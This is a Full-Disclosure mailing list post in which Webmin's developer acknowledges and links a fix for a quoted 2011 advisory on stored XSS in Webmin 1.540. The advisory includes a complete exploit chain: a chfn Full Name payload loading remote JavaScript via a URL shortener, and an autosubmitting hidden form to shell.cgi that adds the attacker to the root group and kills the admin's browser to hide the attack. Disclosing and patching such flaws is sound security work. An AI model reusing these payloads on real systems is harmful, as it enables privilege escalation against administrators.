[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] [webmin-devel] XSS in Webmin 1.540 + exploit for privilege escalation



Hi Javier,

Thanks for reporting this - I hadn't considered this attack
vector, as I didn't realize that chfn could be used to modify a user's
real name.

I have created a fix which you can see at :

https://github.com/webmin/webmin/commit/46e3d3ad195dcdc1af1795c96b6e0dc778fb6881

Also an update for the Users and Groups module can be found at 
http://www.webmin.com/updates.html , and will be available from within
the Webmin UI.

 - Jamie

On 23/Apr/2011 17:46 Javier Bassi <javierbassi@xxxxxxxxx> wrote ..
> Information
> --------------------
> Name :  XSS vulnerability in Webmin
> Software :  All versions prior to and including 1.540 are affected.
> Vendor Hompeage :  http://www.webmin.com
> Vulnerability Type :  Cross-Site Scripting
> Severity :  Medium
> Researcher :  Javier Bassi <javierbassi [at] gmail [dot] com>
> 
> 
> Description
> ------------------
> Webmin is a web-based interface for system administration for Unix.
> Using any modern web browser, you can setup user accounts, Apache,
> DNS, file sharing and much more.
> https://secure.wikimedia.org/wikipedia/en/wiki/Webmin
> 
> 
> Details
> -------------------
> Webmin is affected by a XSS vulnerability in all versions prior to and
> including 1.540.
> Webmin fails to sanitize $real in useradmin/index.cgi. $real is the
> "Full Name" in the finger information of the user. useradmin/index.cgi
> is the control panel of the "Users & Groups" section in webmin.
> An attacker that has a normal user on the victim's machine could be
> able to change his Full Name with chfn command, inject XSS and execute
> commands as root.
> 
> 
> Timeline:
> -------------------
> 2011.04.24 - announced at my site/informed developers/disclosed at my site.
> 
> 
> Solution:
> -------------------
> wait for updates.
> 
> 
> Developing a exploit:
> -------------------
> With Webmin you can execute shell commands and the only security
> measure Webmin has is checking the Referer in the HTTP headers. So we
> can't use <iframe>, but we can bypass this protection by injecting a
> code that execute a Javascript file that prints a form that
> autosubmits itself to the Webmin's shell.cgi and execute mutiple
> commands in the format command1;command2;...;commandn
> So XSS-->.js-->form-->autosubmit-->shell.cgi
> 
> The injected code will be displayed inside a form, so we need to close
> the original form first with </form>.
> The shell/index.cgi form is the next one:
> 
> </form><form class='ui_form' style="visibility:hidden"
> action='https://zion:10000/shell/index.cgi' method=post
> enctype=multipart/form-data >
> <input class='ui_submit' type=submit value="Execute command:">
> <input class='ui_textbox'type=hidden name="cmd" value="" size=50
> style='width:100%'></td>
> <input class='ui_submit' type=submit name="clear" value="Clear history">
> <input class='ui_hidden' type=hidden name="pwd" value="/root">
> <input class='ui_hidden' type=hidden name="history" value="">
> <input class='ui_hidden' type=hidden name="previous" value="find /usr
> -name sftp-server">
> <input class='ui_hidden' type=hidden name="previous" value="echo
> /usr/lib/sftp-server >> /etc/shells">
> <input class='ui_hidden' type=hidden name="previous" value="cat /etc/shells">
> <input class='ui_hidden' type=hidden name="previous" value="find
> /usr/lib -name sftp-server">
> <input class='ui_hidden' type=hidden name="previous" value="echo
> /usr/lib/openssh/sftp-server >> /etc/shells">
> <input class='ui_submit' type=submit name="doprev" value="Execute
> previous command">
> <select class='ui_select' name="pcmd" ><option value="echo
> /usr/lib/openssh/sftp-server >> /etc/shells" >echo
> /usr/lib/openssh/sftp-server >> /etc/shells
> <option value="find /usr/lib -name sftp-server" >find /usr/lib -name 
> sftp-server
> <option value="cat /etc/shells" >cat /etc/shells
> <option value="echo /usr/lib/sftp-server >> /etc/shells" >echo
> /usr/lib/sftp-server >> /etc/shells
> <option value="find /usr -name sftp-server" >find /usr -name sftp-server
> </select><input type=button name=movecmd value='Edit previous'
> onClick='cmd.value = pcmd.options[pcmd.selectedIndex].value'>
> <input class='ui_submit' type=submit name="clearcmds" value="Clear commands">
> </form>
> 
> We use Javascript to autosubmit it. We add id="lala" in form tag and
> also we add the next script at the end of the code:
> <script>document.getElementById('lala').submit();</script>
> 
> Commands go in 'cmd' input. A nice combination of commands could be:
> chfn -f "safename" neo;usermod -G root neo;usermod -g root neo;killall
> -9 firefox-bin
> So when the admim browse "Users & Groups" this will change the Full
> name of our user 'neo' back to a safe one, makes us root and kill
> firefox. The admin will think firefox crashed and when he goes back to
> "Users and Groups" in Webmin it will not crash again beause we already
> changed our full name.
> To include commands in value="" they must be html escaped: (
> http://www.htmlescape.net/htmlescape_tool.html )
> chfn -f &quot;safename&quot; neo;usermod -G root neo;usermod -g root
> neo;killall -9 firefox-bin
> 
> Now we need a .js file that prints the form + the autosubmit code.
> (thx to 
> http://accessify.com/tools-and-wizards/developer-tools/html-javascript-convertor/
> )
> It will look like this
> 
> document.write("<\/form><form class='ui_form'
> style=\"visibility:hidden\" id=\"lala\"
> action='https:\/\/zion:10000\/shell\/index.cgi' method=post
> enctype=multipart\/form-data >");
> document.write("<input class='ui_submit' type=submit value=\"Execute
> command:\">");
> document.write("<input class='ui_textbox'type=hidden name=\"cmd\"
> value=\"chfn -f &quot;safename&quot; neo;usermod -G root neo;usermod
> -g root neo;killall -9 firefox-bin\" size=50
> style='width:100%'><\/td>");
> document.write("<input class='ui_submit' type=submit name=\"clear\"
> value=\"Clear history\">");
> document.write("<input class='ui_hidden' type=hidden name=\"pwd\"
> value=\"\/root\">");
> document.write("<input class='ui_hidden' type=hidden name=\"history\"
> value=\"\">");
> document.write("<input class='ui_hidden' type=hidden name=\"previous\"
> value=\"find \/usr -name sftp-server\">");
> document.write("<input class='ui_hidden' type=hidden name=\"previous\"
> value=\"echo \/usr\/lib\/sftp-server >> \/etc\/shells\">");
> document.write("<input class='ui_hidden' type=hidden name=\"previous\"
> value=\"cat \/etc\/shells\">");
> document.write("<input class='ui_hidden' type=hidden name=\"previous\"
> value=\"find \/usr\/lib -name sftp-server\">");
> document.write("<input class='ui_hidden' type=hidden name=\"previous\"
> value=\"echo \/usr\/lib\/openssh\/sftp-server >> \/etc\/shells\">");
> document.write("<input class='ui_submit' type=submit name=\"doprev\"
> value=\"Execute previous command\">");
> document.write("<select class='ui_select' name=\"pcmd\" ><option
> value=\"echo \/usr\/lib\/openssh\/sftp-server >> \/etc\/shells\" >echo
> \/usr\/lib\/openssh\/sftp-server >> \/etc\/shells");
> document.write("<option value=\"find \/usr\/lib -name sftp-server\"
> >find \/usr\/lib -name sftp-server");
> document.write("<option value=\"cat \/etc\/shells\" >cat \/etc\/shells");
> document.write("<option value=\"echo \/usr\/lib\/sftp-server >>
> \/etc\/shells\" >echo \/usr\/lib\/sftp-server >> \/etc\/shells");
> document.write("<option value=\"find \/usr -name sftp-server\" >find
> \/usr -name sftp-server");
> document.write("<\/select><input type=button name=movecmd value='Edit
> previous' onClick='cmd.value =
> pcmd.options[pcmd.selectedIndex].value'>");
> document.write("<input class='ui_submit' type=submit
> name=\"clearcmds\" value=\"Clear commands\">");
> document.write("<\/form><script>document.getElementById('lala').submit();<\/script>");
> 
> We have to upload the file somewhere and use a url shotener.
> 
> Now we need the script code that loads the .js file. Linux program
> chfn limits the Full name field to 80 chars and restrict the next
> three chars:
>  = (equal) , (comma) or : (colon)
> The XSS code we can use is the next one (tested in FF4.0):
> <script>document.write("<script 
> src\u003d//bit.ly/g2KmJP></scr"+"ipt>")</script>
> (this code bypass NoScript anti-XSS protection)
> 
> To perform the exploit we have login and change our finger information
> 
> neo@Zion ~ $ chfn
> Password:
> Changing the user information for neo
> Enter the new value, or press ENTER for the default
>       Full Name [safename]: <script>document.write("<script
> src\u003d//bit.ly/g2KmJP></scr"+"ipt>")</script>
>       Room Number []:
>       Work Phone []:
>       Home Phone []:
> neo@Zion ~ $
> 
> Finally we wait for the admin to invite us to join the root group ;)
> 
> 
> Other considerations
> -------------------
> * The "//" in the XSS code is equal to "http://"; only in the cases in
> which the code is placed in an http:// website. Because Webmin panel
> is https:// we need a URL shortener service with SSL and a valid
> certificate. That's why I used bit.ly. The shortest ones like goo.gl
> and sr.pr don't have valid SSL ceterfiticate so a warning will appear
> in most browsers when trying to access them via https asking us if we
> want to continue. In an exploit scenario we can't use them.
> * We will be able to modify our Full Name with chfn only if constant
> CHFN_RESTRICT is set to "frwh" in /etc/login.defs. This is the default
> config in Mandriva and Slackware but not in Debian which is set to
> "rwh". I don't know about other distros.
> * With XSS we could have also steal admin's cookie but it's most
> likely that NoScript will block that attack. The reason why NS can't
> block this one is because is not exactly a typical cross-domain XSS.
> This is HTML injection or permanent XSS.
> 
> 
> Credits
> -------------------
> Javier Bassi- http://javierb.com.ar
> Special thanks to barbarianbob from sla.ckers.org for compressing the
> XSS from 92 chars to 80.
> 
> 
> References
> -------------------
> 1. Advisory URL: http://javierb.com.ar/2011/04/24/xss-webmin-1-540/
> 2. Exploit in action: http://www.youtube.com/watch?v=CUO7JLIGUf0
> 
> ------------------------------------------------------------------------------
> Fulfilling the Lean Software Promise
> Lean software platforms are now widely adopted and the benefits have been 
> demonstrated beyond question. Learn why your peers are replacing JEE 
> containers with lightweight application servers - and what you can gain 
> from the move. http://p.sf.net/sfu/vmware-sfemails
> -
> Forwarded by the Webmin development list at webmin-devel@xxxxxxxxxx
> To remove yourself from this list, go to
> http://lists.sourceforge.net/lists/listinfo/webadmin-devel

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/